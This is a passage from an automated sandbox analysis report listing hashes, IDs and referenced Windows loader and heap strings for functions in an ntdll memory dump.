                                                                                                  • Opcode Fuzzy Hash: 438ef3ce45246b3af53ea57df98a7a568ed36618c1c454d17b8499962bc895ee
                                                                                                  • Instruction Fuzzy Hash: 98A16D719112299BDB32DF68CC88BEAF7B8EF44710F1041EAE909A7251D7359E85CF50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • Failed to allocated memory for shimmed module list, xrefs: 0174A10F
                                                                                                  • LdrpCheckModule, xrefs: 0174A117
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0174A121
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-161242083
                                                                                                  • Opcode ID: 051061ac130dd333138d29033a3a0f15f6e3a8b987655ee875b8b740c2465f45
                                                                                                  • Instruction ID: 525516d5bc3f8815f060b969bb8ba452bc0d2813ffbda46076826e1762bef29f
                                                                                                  • Opcode Fuzzy Hash: 051061ac130dd333138d29033a3a0f15f6e3a8b987655ee875b8b740c2465f45
                                                                                                  • Instruction Fuzzy Hash: CE71DE70A4030ADFDB26DF68C985BBEF7F5FB44224F14806DE906A7255E734A981CB50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                  • API String ID: 0-1334570610
                                                                                                  • Opcode ID: f4dfc767f4670a1b394b89e1db443b259974611d49c4c498be299ea32e3ffa6e
                                                                                                  • Instruction ID: 817aad8ba223592562f7502c9e32fac327379a627013f152d816e5023eb8a5e3
                                                                                                  • Opcode Fuzzy Hash: f4dfc767f4670a1b394b89e1db443b259974611d49c4c498be299ea32e3ffa6e
                                                                                                  • Instruction Fuzzy Hash: 33619C706003059FDB29CF28C984B6ABBE2FF45708F14855DE95A8F296D771E881CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 017582E8
                                                                                                  • Failed to reallocate the system dirs string !, xrefs: 017582D7
                                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 017582DE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-1783798831
                                                                                                  • Opcode ID: 700ba534a3f7d5f39dd38997ab9a5cf5e202968034b113aa5394eb09de3feba9
                                                                                                  • Instruction ID: 42a254110063c3b22aef8d4d55c2e4b64df3de54d075f4dc1d9c5a4182cdaaa7
                                                                                                  • Opcode Fuzzy Hash: 700ba534a3f7d5f39dd38997ab9a5cf5e202968034b113aa5394eb09de3feba9
                                                                                                  • Instruction Fuzzy Hash: 2441E671545305ABD722EBA8DC45B5BBBF8EF44760F00852EFA45D3294E7B0D800CB95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0179C1C5
                                                                                                  • PreferredUILanguages, xrefs: 0179C212
                                                                                                  • @, xrefs: 0179C1F1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                  • API String ID: 0-2968386058
                                                                                                  • Opcode ID: d22b01606314a2e35c8106abae71243cfa8f40d12c7b441334219a3e98f8531f
                                                                                                  • Instruction ID: a2b071121eaed23c80744f350cdb5a9b4d235e3fe4e80c987f9557fde58ee71a
                                                                                                  • Opcode Fuzzy Hash: d22b01606314a2e35c8106abae71243cfa8f40d12c7b441334219a3e98f8531f
                                                                                                  • Instruction Fuzzy Hash: 12418371E04219EBDF12DBD8D851FEEFBB9AB18700F1040AAE605B7280D7749A49CB50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                  • API String ID: 0-1373925480
                                                                                                  • Opcode ID: 949415c80ba3cb86d539657d8f7a6a5424b5d0142b9c813c766e9742418fbbf3
                                                                                                  • Instruction ID: 531413a24c7ed766f36e9e60eb5942c8cd2d94345f9dcb0754098531dd5c964e
                                                                                                  • Opcode Fuzzy Hash: 949415c80ba3cb86d539657d8f7a6a5424b5d0142b9c813c766e9742418fbbf3
                                                                                                  • Instruction Fuzzy Hash: 2B41EF72A046598BEF26EBA9DC44BADFBB9FF55340F14045ADA02AB791D6348901CB10
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01764899
                                                                                                  • LdrpCheckRedirection, xrefs: 0176488F
                                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01764888
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                  • API String ID: 0-3154609507
                                                                                                  • Opcode ID: 0db8bf3b11ee67fff435f8b525e47acf5277bb0a1a87a2ef04152fd7cb01996a
                                                                                                  • Instruction ID: 220c2847368c9531bd08448dee1fa93835d8465d1e51cc0d89959ce0a1fc3ba8
                                                                                                  • Opcode Fuzzy Hash: 0db8bf3b11ee67fff435f8b525e47acf5277bb0a1a87a2ef04152fd7cb01996a
                                                                                                  • Instruction Fuzzy Hash: CF41E232A452568FCB21CE6CD940A26FBECEF8A660F06056DED4AD7351D730D800CB81
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                  • API String ID: 0-2558761708
                                                                                                  • Opcode ID: 4d2a13d536ae4803a1cae2be93e9b8036f3616e8519768b0e1a163e5adc88da2
                                                                                                  • Instruction ID: 1be3a29696b824f93f14d30fee3e65d6ae6bae9cdf07685a0c1769f6bd15df45
                                                                                                  • Opcode Fuzzy Hash: 4d2a13d536ae4803a1cae2be93e9b8036f3616e8519768b0e1a163e5adc88da2
                                                                                                  • Instruction Fuzzy Hash: 9211CA313161469FDB29CA18CC84B6AF3A6AF41A26F18816EF506CF256DB30E881C754
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • LdrpInitializationFailure, xrefs: 017620FA
                                                                                                  • Process initialization failed with status 0x%08lx, xrefs: 017620F3
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01762104
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-2986994758
                                                                                                  • Opcode ID: fdec3a35ca9f26fe299a3fd7c2e201aecab109e5c788ca7b1846ab22bdc21499
                                                                                                  • Instruction ID: 9382ecac2d0ca1f8f0a671586b161db9c85878f5cbbfc2d7f994ceb07d67db6f
                                                                                                  • Opcode Fuzzy Hash: fdec3a35ca9f26fe299a3fd7c2e201aecab109e5c788ca7b1846ab22bdc21499
                                                                                                  • Instruction Fuzzy Hash: 36F0C875641309ABE724E64CCC5AFAAB77CEB40B64F51005DFE0577286D6F0AA40CA91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: #%u
                                                                                                  • API String ID: 48624451-232158463
                                                                                                  • Opcode ID: 26401fd580f80d6469f7f3b1d587e77d36a86c878d2de5b881a30805d7ade312
                                                                                                  • Instruction ID: 1ad8f9b5d5c987d4781f4d37735d6f2cdbb50ca4ad5c7fa582244c50f4a329df
                                                                                                  • Opcode Fuzzy Hash: 26401fd580f80d6469f7f3b1d587e77d36a86c878d2de5b881a30805d7ade312
                                                                                                  • Instruction Fuzzy Hash: 45713972A0114A9FDB11DFA8C994BAEBBF9FF08704F144069EA05E7251EB34ED41CB64
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • LdrResSearchResource Exit, xrefs: 016EAA25
                                                                                                  • LdrResSearchResource Enter, xrefs: 016EAA13
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                  • API String ID: 0-4066393604
                                                                                                  • Opcode ID: c12efe62887b6ff187b9dcf91ad45880ecacc0a8733a1483735dadb69961c26e
                                                                                                  • Instruction ID: 9b5cfcc4d78bc5b092e6cc37b6b22619f8bfbee83b12f90840220aca326b4ce0
                                                                                                  • Opcode Fuzzy Hash: c12efe62887b6ff187b9dcf91ad45880ecacc0a8733a1483735dadb69961c26e
                                                                                                  • Instruction Fuzzy Hash: 67E17071E01219ABEF22CEDCDD88BAEBBBABF54310F14466AF901E7251D7349941CB50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: `$`
                                                                                                  • API String ID: 0-197956300
                                                                                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                  • Instruction ID: ce2952a5fc496981435f2aee5c153d863bc78e5a28dffdb1264b76618ac9dcee
                                                                                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                  • Instruction Fuzzy Hash: 18C1BD312043429BEB25CF28C845B6BFBE6AFC4318F584B2DF6968B291D774D505CB92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: Legacy$UEFI
                                                                                                  • API String ID: 2994545307-634100481
                                                                                                  • Opcode ID: 628bba13edd8b61be51b83a4d105ac2d0e4c1db63e61df8d7c27eabbc9e1928e
                                                                                                  • Instruction ID: eed500e9771bafdd534b315b51f169c3248941f065d7fbd1ab4ef509c0d7ccac
                                                                                                  • Opcode Fuzzy Hash: 628bba13edd8b61be51b83a4d105ac2d0e4c1db63e61df8d7c27eabbc9e1928e
                                                                                                  • Instruction Fuzzy Hash: A2617C72E403199FDB64DFA8C940BAEFBB5FB48700F14446DEA49EB241DB71AA40CB50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$MUI
                                                                                                  • API String ID: 0-17815947
                                                                                                  • Opcode ID: 765c221a44d18d314e5c953e8141cdb5063cc9d22da52ab89f99c909aab52db5
                                                                                                  • Instruction ID: 2963cdf86bbb580013dee0d70ce3653d16655b283d69cf9700edfeb616def115
                                                                                                  • Opcode Fuzzy Hash: 765c221a44d18d314e5c953e8141cdb5063cc9d22da52ab89f99c909aab52db5
                                                                                                  • Instruction Fuzzy Hash: 3D513771E4021EAEDF11DFA9CC84FEEFBB9EB14754F100529E611B7290D6709A05CB60
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • kLsE, xrefs: 016E0540
                                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 016E063D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                  • API String ID: 0-2547482624
                                                                                                  • Opcode ID: 4aee6b5f8c2057bf70a9d049a6f6d5b11babe378f4a880493b199294a0364c72
                                                                                                  • Instruction ID: 48eb55b5b626e5ef95d233642e516f4fd899727f52070e80406257f4f8132b94
                                                                                                  • Opcode Fuzzy Hash: 4aee6b5f8c2057bf70a9d049a6f6d5b11babe378f4a880493b199294a0364c72
                                                                                                  • Instruction Fuzzy Hash: 0351AE716057429BD724DF68C9887A7BBE4AF84304F208A3EF69A87241E7B09545CF92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 016EA2FB
                                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 016EA309
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                  • API String ID: 0-2876891731
                                                                                                  • Opcode ID: 898d60ee7ec7c7338b1c9f7c0203528d37a17f930b19d2c9f2959d6246bc20d4
                                                                                                  • Instruction ID: 014d0a50b4c2cac6d2c2302aef4b44aa02b87ca89152ce4b8714920864dd6e22
                                                                                                  • Opcode Fuzzy Hash: 898d60ee7ec7c7338b1c9f7c0203528d37a17f930b19d2c9f2959d6246bc20d4
                                                                                                  • Instruction Fuzzy Hash: 0041DF31A01645DBDB11CF99D848BAEBBF5FF84300F2441A9E914DB392E3B5D941CB50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                                  • API String ID: 2994545307-4008356553
                                                                                                  • Opcode ID: ad0df00323ff1cc3327d982ae0b8e48c881bd93cfb3b4375c5d526a04364b458
                                                                                                  • Instruction ID: 77627dcd8aeaaceef3677fc8204dc6279c7eb6c8167d18904ed584099b35fca8
                                                                                                  • Opcode Fuzzy Hash: ad0df00323ff1cc3327d982ae0b8e48c881bd93cfb3b4375c5d526a04364b458
                                                                                                  • Instruction Fuzzy Hash: 6E01D1B2245784AFD311DF18CD49B56B7F8E794725F048939F649C7194E334E844CB46
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: MUI
                                                                                                  • API String ID: 0-1339004836
                                                                                                  • Opcode ID: 12cce4afb34e87bfb693f7408ff8ac0807f8512562dec088efda00a1bf10a2fa
                                                                                                  • Instruction ID: 593907f4da5d7a99c359fdec232a8a78f2f44996c680bdfea97db8b298ff1ac6
                                                                                                  • Opcode Fuzzy Hash: 12cce4afb34e87bfb693f7408ff8ac0807f8512562dec088efda00a1bf10a2fa
                                                                                                  • Instruction Fuzzy Hash: 69824B75E022198FEB25CFA9C988BEDBBF1BF44310F148269E919AB391D7309941CF50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID: 0-3916222277
                                                                                                  • Opcode ID: c57e3bf6005548c5633dd8b7109d31010e3aace55abe6aad1ee7e3c99e287e97
                                                                                                  • Instruction ID: a059ac22582351bc9f158e02a7040e5a6e7f6e3f297daa600de226dc5b4226ce
                                                                                                  • Opcode Fuzzy Hash: c57e3bf6005548c5633dd8b7109d31010e3aace55abe6aad1ee7e3c99e287e97
                                                                                                  • Instruction Fuzzy Hash: 1D917271900219AFEB21DF95DD85FAEFBB9EF18750F500069FA01AB195D774AD00CBA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID: 0-3916222277
                                                                                                  • Opcode ID: 62ce83f742653742f0f4134431104dee87fb5dd891ffb82b3ee2089d30c98c0b
                                                                                                  • Instruction ID: d46580eb02c406444d766a9057f222e469a634de14f2106ff85b0777a0e07d3e
                                                                                                  • Opcode Fuzzy Hash: 62ce83f742653742f0f4134431104dee87fb5dd891ffb82b3ee2089d30c98c0b
                                                                                                  • Instruction Fuzzy Hash: FC91AE3294161ABFDB22AFA5DC44FAFFBBAEF45750F100029F601A7250EB749901CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: GlobalTags
                                                                                                  • API String ID: 0-1106856819
                                                                                                  • Opcode ID: f08007ffc6ef6cd898946b67746fc497afcdc679976c013a8d04f3b3413a5ece
                                                                                                  • Instruction ID: c77c1dc28058041345e025b7b7243acfbeae93a10f860ee2f49c3e3052695bac
                                                                                                  • Opcode Fuzzy Hash: f08007ffc6ef6cd898946b67746fc497afcdc679976c013a8d04f3b3413a5ece
                                                                                                  • Instruction Fuzzy Hash: 1F717CB5E0020ADFDF68CF9CC490AADFBB1BF48710F54856EE905A7245EBB19841CB60
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .mui
                                                                                                  • API String ID: 0-1199573805
                                                                                                  • Opcode ID: f94a3d2764080eb8f0e5071392fa7557e86f4fbee45b4bf07a3443b4ee4fc660
                                                                                                  • Instruction ID: 019ae89725b6f013532122e7573939f7274b1f00a0eab6c338812ab28a4efece
                                                                                                  • Opcode Fuzzy Hash: f94a3d2764080eb8f0e5071392fa7557e86f4fbee45b4bf07a3443b4ee4fc660
                                                                                                  • Instruction Fuzzy Hash: 0851A272D4122BDBDF10EF99D844BAEFBB5AF14A10F054169EA13BB240D3B49D01CBA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: EXT-
                                                                                                  • API String ID: 0-1948896318
                                                                                                  • Opcode ID: 39803ee1d584cc76aec008b558b780a958d56879de73ff4690b96cdf970addb3
                                                                                                  • Instruction ID: e820472f98905d3782ce147c9bc14870caeaacab4f281b95da2e7a4c7bee05f8
                                                                                                  • Opcode Fuzzy Hash: 39803ee1d584cc76aec008b558b780a958d56879de73ff4690b96cdf970addb3
                                                                                                  • Instruction Fuzzy Hash: 2541B2725083129BD710DA75CC80B6BBBD9AF88714F05092DF784E7290E775DA04C796
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: BinaryHash
                                                                                                  • API String ID: 0-2202222882
                                                                                                  • Opcode ID: ed34062abd564737e2b6331e3263588059e06a722c2dffe68c2ed20529070e68
                                                                                                  • Instruction ID: c884e71c64cdce5d8aaddcdb1026d7ded8085713000eb10f914176aae7093572
                                                                                                  • Opcode Fuzzy Hash: ed34062abd564737e2b6331e3263588059e06a722c2dffe68c2ed20529070e68
                                                                                                  • Instruction Fuzzy Hash: 334153B1D0062DABDB61DA50CC84FDEF77CAB55724F0045A5EB08AB144DB70AE89CFA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #
                                                                                                  • API String ID: 0-1885708031
                                                                                                  • Opcode ID: cf6c8fd643d6b7a06e7fb76476d27b5a0d9af0e523a6d14fb2e69261810d4d56
                                                                                                  • Instruction ID: 66d90a53016b2ed56d70bcc4ed3afd40ff77f48c088b8f486642fa85b8fa7ee2
                                                                                                  • Opcode Fuzzy Hash: cf6c8fd643d6b7a06e7fb76476d27b5a0d9af0e523a6d14fb2e69261810d4d56
                                                                                                  • Instruction Fuzzy Hash: 1831F631A00B199BFF22DB69C854BAEFBB9DF05704F144068FA41AB286D775E845CB50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: BinaryName
                                                                                                  • API String ID: 0-215506332
                                                                                                  • Opcode ID: 55ee96b43487dcb750eceeaffe273162af4957a3bac3339141494f650b895918
                                                                                                  • Instruction ID: 2247088dbe181216c89e702b7154d2b7d6b053565f2de52b2dce5a145fb4b846
                                                                                                  • Opcode Fuzzy Hash: 55ee96b43487dcb750eceeaffe273162af4957a3bac3339141494f650b895918
                                                                                                  • Instruction Fuzzy Hash: E6310536900615AFEB16DB58C855F6FFB78EB80710F014169EE01A7251D7709E00EBE0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0176895E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                  • API String ID: 0-702105204
                                                                                                  • Opcode ID: fe53d93a882fadc355e83e40a5e0f28f4b2a446701a9110e67e11db1042264bf
                                                                                                  • Instruction ID: 3ae0b55fab5326318761b4a05c513113071365535a308f9bd1107f631b0de4f2
                                                                                                  • Opcode Fuzzy Hash: fe53d93a882fadc355e83e40a5e0f28f4b2a446701a9110e67e11db1042264bf
                                                                                                  • Instruction Fuzzy Hash: 5A01F7712053059FE7345A59CC88A56FB7DEF95664B08042CFA811A555CB607C44C797
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
